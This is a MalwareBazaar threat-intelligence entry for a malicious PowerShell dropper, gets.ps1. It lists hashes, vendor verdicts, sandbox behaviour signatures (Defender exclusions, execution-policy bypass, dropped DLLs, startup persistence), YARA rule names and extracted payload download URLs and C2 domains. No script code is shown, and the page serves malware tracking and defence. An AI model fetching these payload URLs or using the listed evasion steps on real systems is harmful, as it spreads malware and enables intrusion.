MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 ba257177a52bb0c3d310d7370d065c5452d1cbfb4e405e2cd494b9e4d71e1bb8. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 7


Intelligence 7 IOCs YARA 3 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: ba257177a52bb0c3d310d7370d065c5452d1cbfb4e405e2cd494b9e4d71e1bb8
SHA3-384 hash: 32833420e221cb4cdf63f823dedbf4febe99a7d43b2174d3c1dd94751f7c621ccd25aa88948204e11f92ed6b37ddb600
SHA1 hash: 1bea16b0748c6f74c95ebab8cbdbf6bbd77544d3
MD5 hash: 782620289b264b95241a91b9d087a438
humanhash: indigo-cardinal-south-lemon
File name:gets.ps1
Download: download sample
File size:8'192 bytes
First seen:2025-05-06 07:04:47 UTC
Last seen:Never
File type:PowerShell (PS) ps1
MIME type:text/plain
ssdeep 192:N7ysfnvynOzad4POVk1Gyp/SD2zKDUtXDZABygKlkO7BGTG:tlkhKIq
TLSH T1CCF1D81BD9048216C37373EA5991CD0DE78F009F92139F1D75ACA8843BB135D8AF69AB
Magika powershell
Reporter abuse_ch
Tags:ps1

Intelligence

File Origin
# of uploads :
1
# of downloads :
93
Origin country :
NL NL
Vendor Threat Intelligence
Verdict:
Malicious
Score:
92.5%
Link:
https://cyber-fortress.com/docs/result/index.php?id=6819b560432e243ac3e47ec7
Tags:
autorun dropper shell virus
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
anti-vm evasive obfuscated powershell
Link:
https://www.filescan.io/uploads/6819b4bc0b64e174c4196d7c/reports/3312af09-bf9b-4e86-96ab-4701973eeeed/overview
Verdict:
Suspicious
Labled as:
PowerShell/HackTool.Agent
Link:
https://www.hybrid-analysis.com/sample/ba257177a52bb0c3d310d7370d065c5452d1cbfb4e405e2cd494b9e4d71e1bb8
Result
Threat name:
n/a
Detection:
malicious
Classification:
expl.evad
Score:
100 / 100
Link:
https://www.joesandbox.com/analysis/1681877
Signature
Adds a directory exclusion to Windows Defender
AI detected malicious Powershell script
Antivirus detection for URL or domain
Bypasses PowerShell execution policy
Command shell drops VBS files
Found suspicious powershell code related to unpacking or dynamic code loading
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Passes commands via pipe to a shell (likely to bypass AV or HIPS)
PE file has nameless sections
Powershell creates an autostart link
Powershell drops PE file
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: Potential WinAPI Calls Via CommandLine
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Powerup Write Hijack DLL
Sigma detected: Suspicious Invoke-WebRequest Execution
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: Suspicious Script Execution From Temp Folder
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Yara detected Powershell download and execute
Behaviour
Behavior Graph:
Download SVG
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1681877 Sample: gets.ps1 Startdate: 06/05/2025 Architecture: WINDOWS Score: 100 112 winpopcach.com 2->112 114 raw.githubusercontent.com 2->114 116 3 other IPs or domains 2->116 144 Malicious sample detected (through community Yara rule) 2->144 146 Antivirus detection for URL or domain 2->146 148 Multi AV Scanner detection for dropped file 2->148 150 12 other signatures 2->150 13 powershell.exe 15 58 2->13         started        18 wscript.exe 1 2->18         started        20 svchost.exe 1 2 2->20         started        signatures3 process4 dnsIp5 120 modulowinapp.com 185.255.122.89, 443, 49693, 49707 ICMESE Netherlands 13->120 122 winpopcach.com 185.255.122.94, 443, 49692, 49706 ICMESE Netherlands 13->122 124 raw.githubusercontent.com 185.199.111.133, 443, 49709 FASTLYUS Netherlands 13->124 104 C:\Users\user\AppData\Roaming\...\libssv.dll, PE32 13->104 dropped 106 C:\Users\user\AppData\Roaming\...\libspv.dll, PE32 13->106 dropped 108 C:\Users\user\AppData\...\libeay32.dll, PE32 13->108 dropped 110 5 other malicious files 13->110 dropped 164 Suspicious powershell command line found 13->164 166 Bypasses PowerShell execution policy 13->166 168 Adds a directory exclusion to Windows Defender 13->168 176 3 other signatures 13->176 22 cmd.exe 13->22         started        24 powershell.exe 12 13->24         started        27 Enigma32g.exe 13->27         started        32 2 other processes 13->32 170 Wscript starts Powershell (via cmd or directly) 18->170 172 Windows Scripting host queries suspicious COM object (likely to drop second stage) 18->172 174 Suspicious execution chain found 18->174 29 powershell.exe 17 18->29         started        126 127.0.0.1 unknown unknown 20->126 file6 signatures7 process8 file9 34 cmd.exe 22->34         started        37 conhost.exe 22->37         started        154 Adds a directory exclusion to Windows Defender 24->154 39 powershell.exe 28 24->39         started        41 chrome.exe 27->41         started        102 C:\Users\user\AppData\Roaming\StartGet2.bat, DOS 29->102 dropped 156 Suspicious powershell command line found 29->156 158 Found suspicious powershell code related to unpacking or dynamic code loading 29->158 160 Powershell drops PE file 29->160 44 cmd.exe 29->44         started        47 powershell.exe 29->47         started        49 conhost.exe 29->49         started        signatures10 process11 dnsIp12 134 Passes commands via pipe to a shell (likely to bypass AV or HIPS) 34->134 51 cmd.exe 34->51         started        54 cmd.exe 34->54         started        56 conhost.exe 34->56         started        69 14 other processes 34->69 136 Loading BitLocker PowerShell Module 39->136 58 conhost.exe 39->58         started        60 WmiPrvSE.exe 39->60         started        118 192.168.2.8, 138, 443, 49395 unknown unknown 41->118 62 chrome.exe 41->62         started        98 C:\Users\user\AppData\Roaming\StartGet2.vbs, ASCII 44->98 dropped 138 Suspicious powershell command line found 44->138 140 Wscript starts Powershell (via cmd or directly) 44->140 142 Command shell drops VBS files 44->142 65 cscript.exe 44->65         started        67 conhost.exe 44->67         started        100 C:\Users\user\AppData\Roaming\StartGet2.ps1, ASCII 47->100 dropped file13 signatures14 process15 dnsIp16 152 Wscript starts Powershell (via cmd or directly) 51->152 71 powershell.exe 51->71         started        73 cmd.exe 54->73         started        75 cmd.exe 54->75         started        128 www.google.com 142.250.188.228, 443, 49718 GOOGLEUS United States 62->128 130 winpopcach.com 62->130 77 cmd.exe 65->77         started        signatures17 process18 signatures19 162 Wscript starts Powershell (via cmd or directly) 77->162 80 powershell.exe 77->80         started        84 conhost.exe 77->84         started        process20 file21 90 C:\Users\user\AppData\Roaming\libssv.dll, PE32 80->90 dropped 92 C:\Users\user\AppData\Roaming\libspv.dll, PE32 80->92 dropped 94 C:\Users\user\AppData\Roaming\libeay32.dll, PE32 80->94 dropped 96 C:\Users\user\...96avegadorExclusivo.exe, PE32 80->96 dropped 132 Loading BitLocker PowerShell Module 80->132 86 NavegadorExclusivo.exe 80->86         started        signatures22 process23 process24 88 chrome.exe 86->88         started       
Score:
13%
Verdict:
Benign
File Type:
SCRIPT
Link:
https://malprob.io/report/ba257177a52bb0c3d310d7370d065c5452d1cbfb4e405e2cd494b9e4d71e1bb8
Detection:
n/a
Link:
https://mwdb.cert.pl/sample/ba257177a52bb0c3d310d7370d065c5452d1cbfb4e405e2cd494b9e4d71e1bb8/
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=xisxc55ffoymhuyq243q2bs4krjnds73jzaf4lguss46jvy6do4a._file
Result
Malware family:
n/a
Score:
  10/10
Tags:
discovery execution
Link:
https://tria.ge/reports/250506-hwnzkaam9s/
Behaviour
Checks processor information in registry
Enumerates system info in registry
Modifies data under HKEY_USERS
Modifies registry class
Runs ping.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
System Network Configuration Discovery: Internet Connection Discovery
Launches sc.exe
Drops startup file
Executes dropped EXE
Loads dropped DLL
Blocklisted process makes network request
Command and Scripting Interpreter: PowerShell
Malware Config
Dropper Extraction:
https://conecwinlab.com/getapp.ps1
https://conecwinlab.com/getapp2.ps1
https://massgrave.dev/troubleshoot
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Malicious File
Score:
1.00
Link:
https://yomi.yoroi.company/submissions/ba257177a52bb0c3d310d7370d065c5452d1cbfb4e405e2cd494b9e4d71e1bb8

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:detect_powershell
Create hunting rule
Author:daniyyell
Description:Detects suspicious PowerShell activity related to malware execution
Rule name:Detect_PowerShell_Obfuscation
Create hunting rule
Author:daniyyell
Description:Detects obfuscated PowerShell commands commonly used in malicious scripts.
Rule name:Disable_Defender
Create hunting rule
Author:iam-py-test
Description:Detect files disabling or modifying Windows Defender, Windows Firewall, or Microsoft Smartscreen

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

PowerShell (PS) ps1 ba257177a52bb0c3d310d7370d065c5452d1cbfb4e405e2cd494b9e4d71e1bb8

(this sample)

  
URLhaus
https://urlhaus.abuse.ch/url/3484463/
  
Delivery method
Distributed via web download

Comments